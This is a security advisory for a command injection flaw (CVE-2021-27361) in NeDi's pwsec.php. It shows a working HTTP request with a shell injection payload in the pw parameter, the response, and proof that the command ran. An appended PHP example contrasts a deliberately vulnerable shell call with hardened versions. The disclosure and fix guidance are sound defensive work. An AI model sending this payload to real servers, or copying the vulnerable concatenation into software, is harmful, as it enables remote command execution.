#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  NeDi [1]
# Vendor:   NeDi
# CSNC ID:  CSNC-2021-003
# CVE ID:   CVE-2021-27361
# Subject:  OS Command Injection
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Emanuele Barbeno
# Date:     01.07.2021
#
#############################################################

Introduction
------------

NeDi is an open source software tool which discovers, maps and inventories network devices and tracks connected end-nodes.

Input parameters sent to the pwsec.php page and used to run operating system commands are not correctly validated by the application, allowing arbitrary command execution on the server. [2]

Affected
--------

Vulnerable:
 * 1.9C1

Not vulnerable:
 * 2.0C

No other version was tested, but it is believed that older versions are vulnerable as well.

Technical Description
---------------------

The pw parameter sent to the pwsec.php page is not sanitized before being used by the application. An authenticated user who sends the following request is able to run arbitrary operating system commands, executed with the privileges of the vulnerable application (www-data by default).

The following HTTP request shows the attack. The chosen payload in the pw parameter creates a new file named test in the /tmp folder. To send this request a valid JSESSIONID cookie is required.

```
POST /pwsec.php HTTP/1.1
Host: mydomain.local
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4028.0 Safari/537.36 autochrome/red
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jql6a7brdgb7f402nebkvih9l9
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

pw=abc';touch+'/tmp/test
```

Here is the HTTP response, showing that the server accepted the request:

```
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 16 Feb 2021 21:46:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 604

Password Security

[CUT BY COMPASS]

```

After the previous request, the test file can be found in the /tmp folder, owned by the www-data user, proving that the touch command has been executed:

```
$ ls -l /tmp/test
-rw-r--r-- 1 www-data www-data 0 Feb 16 15:46 /tmp/test
```

In the pwsec.php file it is possible to find the PHP code responsible for this vulnerability. As shown below, the pw parameter is taken from the body of the request and passed to the system PHP function without any validation:

```
[CUT BY COMPASS]

img src="img/16/lokc.png"> " onclick="select();" >

[CUT BY COMPASS]
```

Workaround / Fix
----------------

If possible, avoid calling OS commands directly and prefer using built-in library functions, because they cannot be manipulated to perform tasks other than those they are intended to do.

If system command execution is still required, perform strict input validation on the input parameter using a whitelist approach to ensure that no malicious characters are accepted. Prefer applying the escapeshellarg() or escapeshellcmd() PHP functions to any value that is passed to exec(), system() or passthru(). [3]

Timeline
--------

2021-02-16: Discovery by Emanuele Barbeno
2021-02-16: Initial vendor notification
2021-02-17: Initial vendor response
2021-02-17: Assigned CVE-2021-27361
2021-07-01: Coordinated public disclosure date

References
----------

[1] https://www.nedi.ch/
[2] https://cwe.mitre.org/data/definitions/78.html
[3] https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html
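The following PHP is an added illustration of the Workaround / Fix section above; it is editor-written example code, not NeDi's pwsec.php (whose source the advisory cuts). The pattern it shows on the vulnerable side is the generic "splice the parameter into a shell string" mistake the advisory describes, and the hardened side applies the three measures the fix recommends: an allow-list check, escapeshellarg() on the value, and, preferably, no shell at all. The binary /usr/local/bin/pwcheck, the function names, and the accepted character set are assumptions chosen for the example.

```php
<?php
// Added example, not code from the advisory or from NeDi.
// The tool invoked (/usr/local/bin/pwcheck) is a placeholder: the real
// command in pwsec.php is cut from the advisory.

// VULNERABLE pattern (for comparison only). A single quote in $pw closes
// the literal and everything after it is parsed as shell syntax, which is
// exactly how the advisory's payload gets "touch" executed.
function pwsec_vulnerable(string $pw): string
{
    return (string) shell_exec("/usr/local/bin/pwcheck '" . $pw . "'");
}

// Allow-list validation (assumed policy): only letters, digits and a few
// punctuation marks, length-capped. Rejecting everything else is safer
// than trying to strip "bad" characters from the input.
function validate_pw(string $pw): bool
{
    return preg_match('/^[A-Za-z0-9._@-]{1,64}$/', $pw) === 1;
}

// Defence in depth when a shell command really is needed: validate first,
// then escapeshellarg() so the value reaches the binary as one argument
// even if the allow-list is loosened later. Returns the command string so
// the caller (or a test) can inspect it before running it.
function pwsec_build_command(string $pw): string
{
    if (!validate_pw($pw)) {
        throw new InvalidArgumentException('pw contains characters outside the allow-list');
    }
    return '/usr/local/bin/pwcheck ' . escapeshellarg($pw);
}

// Preferred option: no shell at all. Since PHP 7.4 proc_open() accepts an
// argument array and executes the program directly, so there is no shell
// parser for metacharacters to reach. Still validate the value first.
function pwsec_hardened(string $pw): string
{
    if (!validate_pw($pw)) {
        throw new InvalidArgumentException('pw contains characters outside the allow-list');
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['/usr/local/bin/pwcheck', $pw], $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start pwcheck');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return (string) $out;
}

// Demonstration with the advisory's payload (constructed input, nothing is
// executed here for the malicious value).
$payload = "abc';touch '/tmp/test";

var_dump(validate_pw($payload));          // bool(false): rejected before any command runs
var_dump(escapeshellarg($payload));       // 'abc'\'';touch '\''/tmp/test' : a single quoted argument
var_dump(pwsec_build_command('abc.123')); // "/usr/local/bin/pwcheck 'abc.123'"

try {
    pwsec_build_command($payload);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```

Only the vulnerable function concatenates raw input into the shell string; note that escapeshellarg() alone would already neutralise the quote in the advisory's payload, but the allow-list is what keeps the parameter within what the page actually expects, and the proc_open() array form removes the shell parser from the path entirely.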